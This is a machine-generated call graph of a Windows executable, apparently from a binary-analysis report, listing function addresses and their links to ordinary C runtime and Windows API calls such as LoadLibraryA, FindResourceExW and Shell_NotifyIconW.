93619->93620 93626 8cd6ab 93619->93626 94169 8cd9a0 53 API calls __cinit 93620->94169 93621->93626 94171 8ddce0 53 API calls 93621->94171 93625->93341 93626->93625 94170 8ddce0 53 API calls 93626->94170 93628 8c641f 93627->93628 93629 8c6406 93627->93629 93631 8c6a63 48 API calls 93628->93631 93630 8c6eed 48 API calls 93629->93630 93632 8c62d1 93630->93632 93631->93632 93633 8e0fa7 93632->93633 93634 8e1028 93633->93634 93635 8e0fb3 93633->93635 94174 8e103a 59 API calls 3 library calls 93634->94174 93642 8e0fd8 93635->93642 94172 8e7c0e 47 API calls __getptd_noexit 93635->94172 93638 8e1035 93638->93347 93639 8e0fbf 94173 8e6e10 8 API calls _xtow_s@20 93639->94173 93641 8e0fca 93641->93347 93642->93347 93644 8dc064 93643->93644 93646 8dc069 Mailbox 93643->93646 94175 8dc1af 48 API calls 93644->94175 93649 8dc077 93646->93649 94176 8dc15c 48 API calls 93646->94176 93648 8df4ea 48 API calls 93651 8dc108 93648->93651 93649->93648 93650 8dc152 93649->93650 93650->93377 93652 8df4ea 48 API calls 93651->93652 93653 8dc113 93652->93653 93653->93377 93653->93653 93655 8d1cf6 93654->93655 93657 8d1ba2 93654->93657 93655->93386 93656 8d1bae 93664 8d1bb9 93656->93664 94178 8dc15c 48 API calls 93656->94178 93657->93656 93659 8df4ea 48 API calls 93657->93659 93660 9349c4 93659->93660 93661 8df4ea 48 API calls 93660->93661 93669 9349cf 93661->93669 93662 8d1c5d 93662->93386 93663 8df4ea 48 API calls 93665 8d1c9f 93663->93665 93664->93662 93664->93663 93666 8d1cb2 93665->93666 94177 8c2925 48 API calls 93665->94177 93666->93386 93668 8df4ea 48 API calls 93668->93669 93669->93656 93669->93668 93670->93386 93680 8cbdfa 93671->93680 93673 8c61b1 93673->93584 93675 8c651b 93674->93675 93679 8c64dd ___crtGetEnvironmentStringsW 93674->93679 93677 8df4ea 48 API calls 93675->93677 93676 8df4ea 48 API calls 93678 8c64e4 93676->93678 93677->93679 93678->93592 93679->93676 93681 8cbe0d 93680->93681 93685 8cbe0a ___crtGetEnvironmentStringsW 93680->93685 93682 8df4ea 48 API calls 93681->93682 93683 8cbe17 93682->93683 93686 8dee75 93683->93686 93685->93673 93687 8df4ea __calloc_impl 93686->93687 93688 8e395c _W_store_winword 47 API calls 93687->93688 93689 8df50c 93687->93689 93690 8df50e std::exception::exception 93687->93690 93688->93687 93689->93685 93695 8e6805 RaiseException 93690->93695 93692 8df538 93696 8e673b 47 API calls _free 93692->93696 93694 8df54a 93694->93685 93695->93692 93696->93694 93762 8c4214 93697->93762 93702 934f73 93705 8c4252 84 API calls 93702->93705 93703 8c41d4 LoadLibraryExW 93772 8c4291 93703->93772 93707 934f7a 93705->93707 93709 8c4291 3 API calls 93707->93709 93711 934f82 93709->93711 93710 8c41fb 93710->93711 93712 8c4207 93710->93712 93798 8c44ed 93711->93798 93714 8c4252 84 API calls 93712->93714 93716 8c39fe 93714->93716 93716->93597 93721 90c396 93716->93721 93718 934fa9 93806 8c4950 93718->93806 93720 934fb6 93722 8c4517 83 API calls 93721->93722 93723 90c405 93722->93723 93987 90c56d 93723->93987 93726 8c44ed 64 API calls 93727 90c432 93726->93727 93728 8c44ed 64 API calls 93727->93728 93729 90c442 93728->93729 93730 8c44ed 64 API calls 93729->93730 93731 90c45d 93730->93731 93732 8c44ed 64 API calls 93731->93732 93733 90c478 93732->93733 93734 8c4517 83 API calls 93733->93734 93735 90c48f 93734->93735 93736 8e395c _W_store_winword 47 API calls 93735->93736 93737 90c496 93736->93737 93738 8e395c _W_store_winword 47 API calls 93737->93738 93739 90c4a0 93738->93739 93740 8c44ed 64 API calls 93739->93740 93741 90c4b4 93740->93741 93742 90bf5a GetSystemTimeAsFileTime 93741->93742 93743 90c4c7 93742->93743 93744 90c4f1 93743->93744 93745 90c4dc 93743->93745 93746 90c556 93744->93746 93747 90c4f7 93744->93747 93748 8e1c9d _free 47 API calls 93745->93748 93751 8e1c9d _free 47 API calls 93746->93751 93993 90b965 93747->93993 93749 90c4e2 93748->93749 93752 8e1c9d _free 47 API calls 93749->93752 93754 90c41b 93751->93754 93752->93754 93754->93602 93756 8c4252 93754->93756 93755 8e1c9d _free 47 API calls 93755->93754 93757 8c425c 93756->93757 93758 8c4263 93756->93758 93759 8e35e4 __fcloseall 83 API calls 93757->93759 93760 8c4272 93758->93760 93761 8c4283 FreeLibrary 93758->93761 93759->93758 93760->93602 93761->93760 93811 8c4339 93762->93811 93765 8c423c 93767 8c41bb 93765->93767 93768 8c4244 FreeLibrary 93765->93768 93769 8e3499 93767->93769 93768->93767 93819 8e34ae 93769->93819 93771 8c41c8 93771->93702 93771->93703 93898 8c42e4 93772->93898 93775 8c42b8 93777 8c41ec 93775->93777 93778 8c42c1 FreeLibrary 93775->93778 93779 8c4380 93777->93779 93778->93777 93780 8df4ea 48 API calls 93779->93780 93781 8c4395 93780->93781 93906 8c47b7 93781->93906 93783 8c43a1 ___crtGetEnvironmentStringsW 93784 8c43dc 93783->93784 93786 8c4499 93783->93786 93787 8c44d1 93783->93787 93785 8c4950 57 API calls 93784->93785 93790 8c43e5 93785->93790 93909 8c406b CreateStreamOnHGlobal 93786->93909 93920 90c750 93 API calls 93787->93920 93791 8c44ed 64 API calls 93790->93791 93793 8c4479 93790->93793 93794 934ed7 93790->93794 93915 8c4517 93790->93915 93791->93790 93793->93710 93795 8c4517 83 API calls 93794->93795 93796 934eeb 93795->93796 93797 8c44ed 64 API calls 93796->93797 93797->93793 93799 8c44ff 93798->93799 93802 934fc0 93798->93802 93944 8e381e 93799->93944 93803 90bf5a 93964 90bdb4 93803->93964 93805 90bf70 93805->93718 93807 935002 93806->93807 93808 8c495f 93806->93808 93969 8e3e65 93808->93969 93810 8c4967 93810->93720 93815 8c434b 93811->93815 93814 8c4321 LoadLibraryA GetProcAddress 93814->93765 93816 8c422f 93815->93816 93817 8c4354 LoadLibraryA 93815->93817 93816->93765 93816->93814 93817->93816 93818 8c4365 GetProcAddress 93817->93818 93818->93816 93822 8e34ba __freefls@4 93819->93822 93820 8e34cd 93867 8e7c0e 47 API calls __getptd_noexit 93820->93867 93822->93820 93824 8e34fe 93822->93824 93823 8e34d2 93868 8e6e10 8 API calls _xtow_s@20 93823->93868 93838 8ee4c8 93824->93838 93827 8e3503 93828 8e350c 93827->93828 93829 8e3519 93827->93829 93869 8e7c0e 47 API calls __getptd_noexit 93828->93869 93830 8e3543 93829->93830 93831 8e3523 93829->93831 93852 8ee5e0 93830->93852 93870 8e7c0e 47 API calls __getptd_noexit 93831->93870 93835 8e34dd @_EH4_CallFilterFunc@8 __freefls@4 93835->93771 93839 8ee4d4 __freefls@4 93838->93839 93840 8e7cf4 __lock 47 API calls 93839->93840 93841 8ee4e2 93840->93841 93842 8ee559 93841->93842 93849 8e7d7c __mtinitlocknum 47 API calls 93841->93849 93850 8ee552 93841->93850 93875 8e4e5b 48 API calls __lock 93841->93875 93876 8e4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93841->93876 93877 8e69d0 47 API calls _W_store_winword 93842->93877 93845 8ee560 93847 8ee56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93845->93847 93845->93850 93846 8ee5cc __freefls@4 93846->93827 93847->93850 93849->93841 93872 8ee5d7 93850->93872 93853 8ee600 __wopenfile 93852->93853 93854 8ee61a 93853->93854 93866 8ee7d5 93853->93866 93884 8e185b 59 API calls 2 library calls 93853->93884 93882 8e7c0e 47 API calls __getptd_noexit 93854->93882 93856 8ee61f 93883 8e6e10 8 API calls _xtow_s@20 93856->93883 93858 8e354e 93871 8e3570 LeaveCriticalSection LeaveCriticalSection _fprintf 93858->93871 93859 8ee838 93879 8f63c9 93859->93879 93862 8ee7ce 93862->93866 93885 8e185b 59 API calls 2 library calls 93862->93885 93864 8ee7ed 93864->93866 93886 8e185b 59 API calls 2 library calls 93864->93886 93866->93854 93866->93859 93867->93823 93868->93835 93869->93835 93870->93835 93871->93835 93878 8e7e58 LeaveCriticalSection 93872->93878 93874 8ee5de 93874->93846 93875->93841 93876->93841 93877->93845 93878->93874 93887 8f5bb1 93879->93887 93881 8f63e2 93881->93858 93882->93856 93883->93858 93884->93862 93885->93864 93886->93866 93888 8f5bbd __freefls@4 93887->93888 93889 8f5bcf 93888->93889 93892 8f5c06 93888->93892 93890 8e7c0e _xtow_s@20 47 API calls 93889->93890 93891 8f5bd4 93890->93891 93894 8e6e10 _xtow_s@20 8 API calls 93891->93894 93893 8f5c78 __wsopen_helper 110 API calls 93892->93893 93895 8f5c23 93893->93895 93897 8f5bde __freefls@4 93894->93897 93896 8f5c4c __wsopen_helper LeaveCriticalSection 93895->93896 93896->93897 93897->93881 93902 8c42f6 93898->93902 93901 8c42cc LoadLibraryA GetProcAddress 93901->93775 93903 8c42aa 93902->93903 93904 8c42ff LoadLibraryA 93902->93904 93903->93775 93903->93901 93904->93903 93905 8c4310 GetProcAddress 93904->93905 93905->93903 93907 8df4ea 48 API calls 93906->93907 93908 8c47c9 93907->93908 93908->93783 93910 8c4085 FindResourceExW 93909->93910 93914 8c40a2 93909->93914 93911 934f16 LoadResource 93910->93911 93910->93914 93912 934f2b SizeofResource 93911->93912 93911->93914 93913 934f3f LockResource 93912->93913 93912->93914 93913->93914 93914->93784 93916 934fe0 93915->93916 93917 8c4526 93915->93917 93921 8e3a8d 93917->93921 93919 8c4534 93919->93790 93920->93784 93925 8e3a99 __freefls@4 93921->93925 93922 8e3aa7 93934 8e7c0e 47 API calls __getptd_noexit 93922->93934 93924 8e3acd 93936 8e4e1c 93924->93936 93925->93922 93925->93924 93927 8e3aac 93935 8e6e10 8 API calls _xtow_s@20 93927->93935 93928 8e3ad3 93942 8e39fe 81 API calls 4 library calls 93928->93942 93931 8e3ae2 93943 8e3b04 LeaveCriticalSection LeaveCriticalSection _fprintf 93931->93943 93933 8e3ab7 __freefls@4 93933->93919 93934->93927 93935->93933 93937 8e4e4e EnterCriticalSection 93936->93937 93938 8e4e2c 93936->93938 93940 8e4e44 93937->93940 93938->93937 93939 8e4e34 93938->93939 93941 8e7cf4 __lock 47 API calls 93939->93941 93940->93928 93941->93940 93942->93931 93943->93933 93947 8e3839 93944->93947 93946 8c4510 93946->93803 93948 8e3845 __freefls@4 93947->93948 93949 8e385b _memset 93948->93949 93950 8e3888 93948->93950 93951 8e3880 __freefls@4 93948->93951 93960 8e7c0e 47 API calls __getptd_noexit 93949->93960 93952 8e4e1c __lock_file 48 API calls 93950->93952 93951->93946 93954 8e388e 93952->93954 93962 8e365b 62 API calls 5 library calls 93954->93962 93955 8e3875 93961 8e6e10 8 API calls _xtow_s@20 93955->93961 93958 8e38a4 93963 8e38c2 LeaveCriticalSection LeaveCriticalSection _fprintf 93958->93963 93960->93955 93961->93951 93962->93958 93963->93951 93967 8e344a GetSystemTimeAsFileTime 93964->93967 93966 90bdc3 93966->93805 93968 8e3478 __aulldiv 93967->93968 93968->93966 93970 8e3e71 __freefls@4 93969->93970 93971 8e3e7f 93970->93971 93972 8e3e94 93970->93972 93983 8e7c0e 47 API calls __getptd_noexit 93971->93983 93974 8e4e1c __lock_file 48 API calls 93972->93974 93976 8e3e9a 93974->93976 93975 8e3e84 93984 8e6e10 8 API calls _xtow_s@20 93975->93984 93985 8e3b0c 55 API calls 5 library calls 93976->93985 93979 8e3ea5 93986 8e3ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 93979->93986 93981 8e3eb7 93982 8e3e8f __freefls@4 93981->93982 93982->93810 93983->93975 93984->93982 93985->93979 93986->93981 93991 90c581 __tzset_nolock _wcscmp 93987->93991 93988 90bf5a GetSystemTimeAsFileTime 93988->93991 93989 90c417 93989->93726 93989->93754 93990 8c44ed 64 API calls 93990->93991 93991->93988 93991->93989 93991->93990 93992 8c4517 83 API calls 93991->93992 93992->93991 93994 90b970 93993->93994 93995 90b97e 93993->93995 93996 8e3499 117 API calls 93994->93996 93997 90b9c3 93995->93997 93998 8e3499 117 API calls 93995->93998 94010 90b987 93995->94010 93996->93995 94024 90bbe8 64 API calls 3 library calls 93997->94024 94000 90b9a8 93998->94000 94000->93997 94002 90b9b1 94000->94002 94001 90ba07 94003 90ba0b 94001->94003 94004 90ba2c 94001->94004 94002->94010 94035 8e35e4 94002->94035 94005 90ba18 94003->94005 94009 8e35e4 __fcloseall 83 API calls 94003->94009 94025 90b7e5 47 API calls _W_store_winword 94004->94025 94005->94010 94012 8e35e4 __fcloseall 83 API calls 94005->94012 94008 90ba34 94011 90ba5a 94008->94011 94013 90ba3a 94008->94013 94009->94005 94010->93755 94026 90ba8a 90 API calls 94011->94026 94012->94010 94015 8e35e4 __fcloseall 83 API calls 94013->94015 94016 90ba47 94013->94016 94015->94016 94016->94010 94018 8e35e4 __fcloseall 83 API calls 94016->94018 94017 90ba61 94027 90bb64 94017->94027 94018->94010 94021 90ba75 94021->94010 94023 8e35e4 __fcloseall 83 API calls 94021->94023 94022 8e35e4 __fcloseall 83 API calls 94022->94021 94023->94010 94024->94001 94025->94008 94026->94017 94028 90bb71 94027->94028 94029 90bb77 94027->94029 94030 8e1c9d _free 47 API calls 94028->94030 94031 90bb88 94029->94031 94032 8e1c9d _free 47 API calls 94029->94032 94030->94029 94033 8e1c9d _free 47 API calls 94031->94033 94034 90ba68 94031->94034 94032->94031 94033->94034 94034->94021 94034->94022 94036 8e35f0 __freefls@4 94035->94036 94037 8e361c 94036->94037 94038 8e3604 94036->94038 94040 8e4e1c __lock_file 48 API calls 94037->94040 94045 8e3614 __freefls@4 94037->94045 94064 8e7c0e 47 API calls __getptd_noexit 94038->94064 94042 8e362e 94040->94042 94041 8e3609 94065 8e6e10 8 API calls _xtow_s@20 94041->94065 94048 8e3578 94042->94048 94045->94010 94049 8e359b 94048->94049 94050 8e3587 94048->94050 94056 8e3597 94049->94056 94067 8e2c84 94049->94067 94107 8e7c0e 47 API calls __getptd_noexit 94050->94107 94052 8e358c 94108 8e6e10 8 API calls _xtow_s@20 94052->94108 94066 8e3653 LeaveCriticalSection LeaveCriticalSection _fprintf 94056->94066 94060 8e35b5 94084 8ee9d2 94060->94084 94062 8e35bb 94062->94056 94063 8e1c9d _free 47 API calls 94062->94063 94063->94056 94064->94041 94065->94045 94066->94045 94068 8e2cbb 94067->94068 94069 8e2c97 94067->94069 94073 8eeb36 94068->94073 94069->94068 94070 8e2933 __fclose_nolock 47 API calls 94069->94070 94071 8e2cb4 94070->94071 94109 8eaf61 94071->94109 94074 8e35af 94073->94074 94075 8eeb43 94073->94075 94077 8e2933 94074->94077 94075->94074 94076 8e1c9d _free 47 API calls 94075->94076 94076->94074 94078 8e293d 94077->94078 94079 8e2952 94077->94079 94134 8e7c0e 47 API calls __getptd_noexit 94078->94134 94079->94060 94081 8e2942 94135 8e6e10 8 API calls _xtow_s@20 94081->94135 94083 8e294d 94083->94060 94085 8ee9de __freefls@4 94084->94085 94086 8ee9fe 94085->94086 94087 8ee9e6 94085->94087 94089 8eea7b 94086->94089 94094 8eea28 94086->94094 94160 8e7bda 47 API calls __getptd_noexit 94087->94160 94164 8e7bda 47 API calls __getptd_noexit 94089->94164 94090 8ee9eb 94161 8e7c0e 47 API calls __getptd_noexit 94090->94161 94093 8eea80 94165 8e7c0e 47 API calls __getptd_noexit 94093->94165 94136 8ea8ed 94094->94136 94097 8eea88 94166 8e6e10 8 API calls _xtow_s@20 94097->94166 94098 8eea2e 94100 8eea4c 94098->94100 94101 8eea41 94098->94101 94162 8e7c0e 47 API calls __getptd_noexit 94100->94162 94145 8eea9c 94101->94145 94102 8ee9f3 __freefls@4 94102->94062 94105 8eea47 94163 8eea73 LeaveCriticalSection __unlock_fhandle 94105->94163 94107->94052 94108->94056 94110 8eaf6d __freefls@4 94109->94110 94111 8eaf8d 94110->94111 94112 8eaf75 94110->94112 94114 8eb022 94111->94114 94118 8eafbf 94111->94118 94113 8e7bda __set_osfhnd 47 API calls 94112->94113 94115 8eaf7a 94113->94115 94116 8e7bda __set_osfhnd 47 API calls 94114->94116 94117 8e7c0e _xtow_s@20 47 API calls 94115->94117 94119 8eb027 94116->94119 94120 8eaf82 __freefls@4 94117->94120 94121 8ea8ed ___lock_fhandle 49 API calls 94118->94121 94122 8e7c0e _xtow_s@20 47 API calls 94119->94122 94120->94068 94123 8eafc5 94121->94123 94124 8eb02f 94122->94124 94125 8eafeb 94123->94125 94126 8eafd8 94123->94126 94127 8e6e10 _xtow_s@20 8 API calls 94124->94127 94128 8e7c0e _xtow_s@20 47 API calls 94125->94128 94129 8eb043 __chsize_nolock 75 API calls 94126->94129 94127->94120 94131 8eaff0 94128->94131 94130 8eafe4 94129->94130 94133 8eb01a __flswbuf LeaveCriticalSection 94130->94133 94132 8e7bda __set_osfhnd 47 API calls 94131->94132 94132->94130 94133->94120 94134->94081 94135->94083 94137 8ea8f9 __freefls@4 94136->94137 94138 8ea946 EnterCriticalSection 94137->94138 94140 8e7cf4 __lock 47 API calls 94137->94140 94139 8ea96c __freefls@4 94138->94139 94139->94098 94141 8ea91d 94140->94141 94142 8ea93a 94141->94142 94143 8ea928 InitializeCriticalSectionAndSpinCount 94141->94143 94144 8ea970 ___lock_fhandle LeaveCriticalSection 94142->94144 94143->94142 94144->94138 94146 8eaba4 __chsize_nolock 47 API calls 94145->94146 94149 8eeaaa 94146->94149 94147 8eeb00 94148 8eab1e __free_osfhnd 48 API calls 94147->94148 94151 8eeb08 94148->94151 94149->94147 94152 8eaba4 __chsize_nolock 47 API calls 94149->94152 94159 8eeade 94149->94159 94150 8eaba4 __chsize_nolock 47 API calls 94153 8eeaea CloseHandle 94150->94153 94156 8e7bed __dosmaperr 47 API calls 94151->94156 94157 8eeb2a 94151->94157 94154 8eead5 94152->94154 94153->94147 94155 8eeaf6 GetLastError 94153->94155 94158 8eaba4 __chsize_nolock 47 API calls 94154->94158 94155->94147 94156->94157 94157->94105 94158->94159 94159->94147 94159->94150 94160->94090 94161->94102 94162->94105 94163->94102 94164->94093 94165->94097 94166->94102 94167->93608 94168->93615 94169->93625 94170->93625 94171->93626 94172->93639 94173->93641 94174->93638 94175->93646 94176->93649 94177->93666 94178->93664 94238 8ef8a0 94179->94238 94182 8c6a63 48 API calls 94183 8c6643 94182->94183 94240 8c6571 94183->94240 94186 8c40a7 94187 8ef8a0 __ftell_nolock 94186->94187 94188 8c40b4 GetLongPathNameW 94187->94188 94189 8c6a63 48 API calls 94188->94189 94190 8c40dc 94189->94190 94191 8c49a0 94190->94191 94192 8cd7f7 48 API calls 94191->94192 94193 8c49b2 94192->94193 94194 8c660f 49 API calls 94193->94194 94195 8c49bd 94194->94195 94196 8c49c8 94195->94196 94199 932e35 94195->94199 94198 8c64cf 48 API calls 94196->94198 94200 8c49d4 94198->94200 94201 932e4f 94199->94201 94254 8dd35e 60 API calls 94199->94254 94248 8c28a6 94200->94248 94203 8c49e7 Mailbox 94203->93402 94205 8c41a9 136 API calls 94204->94205 94206 8c415e 94205->94206 94207 933489 94206->94207 94208 8c41a9 136 API calls 94206->94208 94209 90c396 122 API calls 94207->94209 94210 8c4172 94208->94210 94211 93349e 94209->94211 94210->94207 94212 8c417a 94210->94212 94213 9334a2 94211->94213 94214 9334bf 94211->94214 94216 9334aa 94212->94216 94217 8c4186 94212->94217 94218 8c4252 84 API calls 94213->94218 94215 8df4ea 48 API calls 94214->94215 94237 933504 Mailbox 94215->94237 94356 906b49 87 API calls _wprintf 94216->94356 94255 8cc833 94217->94255 94218->94216 94221 9334b8 94221->94214 94223 9336b4 94224 8e1c9d _free 47 API calls 94223->94224 94225 9336bc 94224->94225 94226 8c4252 84 API calls 94225->94226 94231 9336c5 94226->94231 94230 8e1c9d _free 47 API calls 94230->94231 94231->94230 94233 8c4252 84 API calls 94231->94233 94360 9025b5 86 API calls 4 library calls 94231->94360 94233->94231 94234 8cce19 48 API calls 94234->94237 94237->94223 94237->94231 94237->94234 94342 8cba85 94237->94342 94350 8c4dd9 94237->94350 94357 902551 48 API calls ___crtGetEnvironmentStringsW 94237->94357 94358 902472 60 API calls 2 library calls 94237->94358 94359 909c12 48 API calls 94237->94359 94239 8c661c GetFullPathNameW 94238->94239 94239->94182 94241 8c657f 94240->94241 94244 8cb18b 94241->94244 94243 8c4114 94243->94186 94245 8cb199 94244->94245 94247 8cb1a2 ___crtGetEnvironmentStringsW 94244->94247 94246 8cbdfa 48 API calls 94245->94246 94245->94247 94246->94247 94247->94243 94249 8c28b8 94248->94249 94253 8c28d7 ___crtGetEnvironmentStringsW 94248->94253 94252 8df4ea 48 API calls 94249->94252 94250 8df4ea 48 API calls 94251 8c28ee 94250->94251 94251->94203 94252->94253 94253->94250 94254->94199 94256 8cc843 __ftell_nolock 94255->94256 94257 933095 94256->94257 94258 8cc860 94256->94258 94385 9025b5 86 API calls 4 library calls 94257->94385 94366 8c48ba 49 API calls 94258->94366 94261 9330a8 94386 9025b5 86 API calls 4 library calls 94261->94386 94262 8cc882 94367 8c4550 56 API calls 94262->94367 94264 8cc897 94264->94261 94266 8cc89f 94264->94266 94267 8cd7f7 48 API calls 94266->94267 94269 8cc8ab 94267->94269 94268 9330c4 94271 8cc90c 94268->94271 94368 8de968 49 API calls __ftell_nolock 94269->94368 94273 9330d7 94271->94273 94274 8cc91a 94271->94274 94272 8cc8b7 94276 8cd7f7 48 API calls 94272->94276 94275 8c4907 CloseHandle 94273->94275 94371 8e1dfc 94274->94371 94278 9330e3 94275->94278 94279 8cc8c3 94276->94279 94280 8c41a9 136 API calls 94278->94280 94281 8c660f 49 API calls 94279->94281 94282 93310d 94280->94282 94283 8cc8d1 94281->94283 94285 933136 94282->94285 94288 90c396 122 API calls 94282->94288 94369 8deb66 SetFilePointerEx ReadFile 94283->94369 94284 8cc943 _wcscat _wcscpy 94287 8cc96d SetCurrentDirectoryW 94284->94287 94387 9025b5 86 API calls 4 library calls 94285->94387 94291 8df4ea 48 API calls 94287->94291 94292 933129 94288->94292 94289 8cc8fd 94370 8c46ce SetFilePointerEx SetFilePointerEx 94289->94370 94294 8cc988 94291->94294 94295 933152 94292->94295 94296 933131 94292->94296 94297 8c47b7 48 API calls 94294->94297 94299 8c4252 84 API calls 94295->94299 94298 8c4252 84 API calls 94296->94298 94330 8cc993 Mailbox __wsetenvp 94297->94330 94298->94285 94300 933157 94299->94300 94301 8df4ea 48 API calls 94300->94301 94308 933194 94301->94308 94302 8cca9d 94381 8c4907 94302->94381 94306 8ccaa9 SetCurrentDirectoryW 94328 8ccad1 Mailbox 94306->94328 94307 8c3d98 94307->93269 94307->93293 94310 8cba85 48 API calls 94308->94310 94339 9331dd Mailbox 94310->94339 94312 9333ce 94392 909b72 48 API calls 94312->94392 94313 933467 94396 9025b5 86 API calls 4 library calls 94313->94396 94316 933480 94316->94302 94318 9333f0 94393 9229e8 48 API calls ___crtGetEnvironmentStringsW 94318->94393 94320 9333fd 94323 8e1c9d _free 47 API calls 94320->94323 94322 93345f 94395 90240b 48 API calls 3 library calls 94322->94395 94323->94328 94324 8cce19 48 API calls 94324->94330 94326 8cba85 48 API calls 94326->94339 94361 8c48dd 94328->94361 94330->94302 94330->94313 94330->94322 94330->94324 94374 8cb337 56 API calls _wcscpy 94330->94374 94375 8dc258 GetStringTypeW 94330->94375 94376 8ccb93 59 API calls __wcsnicmp 94330->94376 94377 8ccb5a GetStringTypeW __wsetenvp 94330->94377 94378 8e16d0 GetStringTypeW __towlower_l 94330->94378 94379 8ccc24 162 API calls 3 library calls 94330->94379 94380 8dc682 48 API calls 94330->94380 94333 8cce19 48 API calls 94333->94339 94336 933420 94394 9025b5 86 API calls 4 library calls 94336->94394 94338 933439 94340 8e1c9d _free 47 API calls 94338->94340 94339->94312 94339->94326 94339->94333 94339->94336 94388 902551 48 API calls ___crtGetEnvironmentStringsW 94339->94388 94389 902472 60 API calls 2 library calls 94339->94389 94390 909c12 48 API calls 94339->94390 94391 8dc682 48 API calls 94339->94391 94341 93314d 94340->94341 94341->94328 94343 8cbb25 94342->94343 94348 8cba98 ___crtGetEnvironmentStringsW 94342->94348 94345 8df4ea 48 API calls 94343->94345 94344 8df4ea 48 API calls 94346 8cba9f 94344->94346 94345->94348 94347 8df4ea 48 API calls 94346->94347 94349 8cbac8 94346->94349 94347->94349 94348->94344 94349->94237 94352 8c4dec 94350->94352 94355 8c4e9a 94350->94355 94351 8c4e1e 94353 8df4ea 48 API calls 94351->94353 94351->94355 94352->94351 94354 8df4ea 48 API calls 94352->94354 94353->94351 94354->94351 94355->94237 94356->94221 94357->94237 94358->94237 94359->94237 94360->94231 94362 8c4907 CloseHandle 94361->94362 94363 8c48e5 Mailbox 94362->94363 94364 8c4907 CloseHandle 94363->94364 94365 8c48fc 94364->94365 94365->94307 94366->94262 94367->94264 94368->94272 94369->94289 94370->94271 94397 8e1e46 94371->94397 94374->94330 94375->94330 94376->94330 94377->94330 94378->94330 94379->94330 94380->94330 94382 8c4920 94381->94382 94383 8c4911 94381->94383 94382->94383 94384 8c4925 CloseHandle 94382->94384 94383->94306 94384->94383 94385->94261 94386->94268 94387->94341 94388->94339 94389->94339 94390->94339 94391->94339 94392->94318 94393->94320 94394->94338 94395->94313 94396->94316 94398 8e1e61 94397->94398 94401 8e1e55 94397->94401 94421 8e7c0e 47 API calls __getptd_noexit 94398->94421 94400 8e2019 94406 8e1e41 94400->94406 94422 8e6e10 8 API calls _xtow_s@20 94400->94422 94401->94398 94412 8e1ed4 94401->94412 94416 8e9d6b 47 API calls _xtow_s@20 94401->94416 94404 8e1fa0 94404->94398 94404->94406 94407 8e1fb0 94404->94407 94405 8e1f5f 94405->94398 94408 8e1f7b 94405->94408 94418 8e9d6b 47 API calls _xtow_s@20 94405->94418 94406->94284 94420 8e9d6b 47 API calls _xtow_s@20 94407->94420 94408->94398 94408->94406 94411 8e1f91 94408->94411 94419 8e9d6b 47 API calls _xtow_s@20 94411->94419 94412->94398 94415 8e1f41 94412->94415 94417 8e9d6b 47 API calls _xtow_s@20 94412->94417 94415->94404 94415->94405 94416->94412 94417->94415 94418->94408 94419->94406 94420->94406 94421->94400 94422->94406 94424 8df4ea 48 API calls 94423->94424 94425 8c6b54 94424->94425 94425->93413 94426->93415 94428 8c4c8b 94427->94428 94433 8c4d94 94427->94433 94429 8df4ea 48 API calls 94428->94429 94428->94433 94430 8c4cb2 94429->94430 94431 8df4ea 48 API calls 94430->94431 94437 8c4d22 94431->94437 94433->93419 94435 8c4dd9 48 API calls 94435->94437 94436 8cba85 48 API calls 94436->94437 94437->94433 94437->94435 94437->94436 94440 8cb470 94437->94440 94468 909af1 48 API calls 94437->94468 94438->93421 94439->93423 94469 8c6b0f 94440->94469 94442 8cb69b 94443 8cba85 48 API calls 94442->94443 94444 8cb6b5 Mailbox 94443->94444 94444->94437 94447 933939 ___crtGetEnvironmentStringsW 94483 9026bc 88 API calls 4 library calls 94447->94483 94448 8cba85 48 API calls 94452 8cb495 94448->94452 94449 93397b 94484 9026bc 88 API calls 4 library calls 94449->94484 94452->94442 94452->94447 94452->94448 94452->94449 94457 8cbcce 48 API calls 94452->94457 94459 8cb9e4 94452->94459 94460 933909 94452->94460 94465 8cbdfa 48 API calls 94452->94465 94474 8cc413 59 API calls 94452->94474 94475 8cbb85 94452->94475 94480 8cbc74 48 API calls 94452->94480 94481 8cc6a5 49 API calls 94452->94481 94482 8cc799 48 API calls ___crtGetEnvironmentStringsW 94452->94482 94454 933989 94458 8cba85 48 API calls 94454->94458 94455 933973 94455->94444 94457->94452 94458->94455 94485 9026bc 88 API calls 4 library calls 94459->94485 94461 8c6b4a 48 API calls 94460->94461 94463 933914 94461->94463 94467 8df4ea 48 API calls 94463->94467 94466 8cb66c CharUpperBuffW 94465->94466 94466->94452 94467->94447 94468->94437 94470 8df4ea 48 API calls 94469->94470 94471 8c6b34 94470->94471 94472 8c6b4a 48 API calls 94471->94472 94473 8c6b43 94472->94473 94473->94452 94474->94452 94476 8cbb9b 94475->94476 94479 8cbb96 ___crtGetEnvironmentStringsW 94475->94479 94477 931b77 94476->94477 94478 8dee75 48 API calls 94476->94478 94478->94479 94479->94452 94480->94452 94481->94452 94482->94452 94483->94455 94484->94454 94485->94455 94487 8c403c LoadImageW 94486->94487 94488 93418d EnumResourceNamesW 94486->94488 94489 8c3ee1 RegisterClassExW 94487->94489 94488->94489 94490 8c3f53 7 API calls 94489->94490 94490->93438 94492 933c33 94491->94492 94493 8c4c44 94491->94493 94492->94493 94494 933c3c DestroyIcon 94492->94494 94493->93444 94517 905819 61 API calls _W_store_winword 94493->94517 94494->94493 94496 8c51cb 94495->94496 94516 8c52a2 Mailbox 94495->94516 94497 8c6b0f 48 API calls 94496->94497 94498 8c51d9 94497->94498 94499 933ca1 LoadStringW 94498->94499 94500 8c51e6 94498->94500 94503 933cbb 94499->94503 94501 8c6a63 48 API calls 94500->94501 94502 8c51fb 94501->94502 94502->94503 94504 8c520c 94502->94504 94505 8c510d 48 API calls 94503->94505 94506 8c5216 94504->94506 94507 8c52a7 94504->94507 94510 933cc5 94505->94510 94508 8c510d 48 API calls 94506->94508 94509 8c6eed 48 API calls 94507->94509 94513 8c5220 _memset _wcscpy 94508->94513 94509->94513 94511 8c518c 48 API calls 94510->94511 94510->94513 94512 933ce7 94511->94512 94515 8c518c 48 API calls 94512->94515 94514 8c5288 Shell_NotifyIconW 94513->94514 94514->94516 94515->94513 94516->93449 94517->93444 94519 8cef1d 94518->94519 94520 8cef2f 94518->94520 94676 8ce3b0 335 API calls 2 library calls 94519->94676 94677 90cc5c 86 API calls 4 library calls 94520->94677 94522 8cef26 94522->93510 94524 9386f9 94524->94524 94526 8cf130 94525->94526 94529 8cfe30 335 API calls 94526->94529 94534 8cf199 94526->94534 94527 8cf3dd 